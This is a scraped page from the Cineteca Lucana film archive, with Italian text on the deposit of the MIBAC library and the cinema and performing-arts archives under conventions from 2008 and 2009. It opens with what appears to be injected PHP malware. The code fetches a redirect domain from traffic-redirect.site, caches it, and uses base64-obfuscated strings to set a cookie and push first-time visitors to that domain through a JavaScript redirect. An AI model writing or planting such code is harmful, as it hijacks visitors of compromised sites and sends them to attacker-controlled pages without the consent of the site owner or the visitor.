$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Ministero per i beni e le attività culturali - Cineteca Lucana

Ministero per i beni e le attività culturali

Ministero per i beni e le attività culturali
Ministero per i beni e le attività culturali

Il fondo del MIBAC, depositato presso la Cineteca Lucana, è costituito dalla biblioteca storica del Ministero, dall’archivio della Direzione Generale per il Cinema e dall’archivio della Direzione Generale per lo Spettacolo dal vivo. Il deposito è sancito da tre differenti convenzioni: la prima reca la data del 12 maggio 2008 ed è sottoscritta dalla Direzione generale per il Cinema e prevede il deposito presso la Cineteca Lucana della biblioteca dell’ex Ministero turismo e spet-tacolo, conservata a Roma nell’ex magazzino pellicole in via della Ferratella in Laterano n. 51.

Convenzione fra Cineteca Lucana e MiBACT per la biblioteca dell’ex Ministero Turismo e Spettacolo

La seconda e la terza convenzione, entrambe del 7 luglio 2009, prevedono il deposito presso la Cineteca Lucana degli archivi della Direzione generale per il cinema e della Direzione generale per lo spettacolo dal vivo, conservati a Roma nell’ex sede in via della Ferratella in Laterano (oggi sede del Ministero per il turismo). L’imponenza del materiale che costituisce il fondo MIBAC è stimata all’incirca in 250 tonnellate di peso. Gli atti stabiliscono che la Cineteca Lucana deve provvedere alla spedizione di materiale in caso di richiesta da parte delle due Direzioni, valorizzare e far fruire il materiale. Il materiale bibliografico non è inventariato ed è conservato presso la biblioteca della Cineteca in Piazza G. Marconi. La consistenza è di circa 110 ml e la documentazione copre un arco cronologico che va dal 1956 al 1999 circa. Organizzata in faldoni originali, sistemati su pedane di legno ed avvolti da film protettivo, è conservata presso i depositi di contrada Serra, contrada S. Francesco e presso i depositi romani.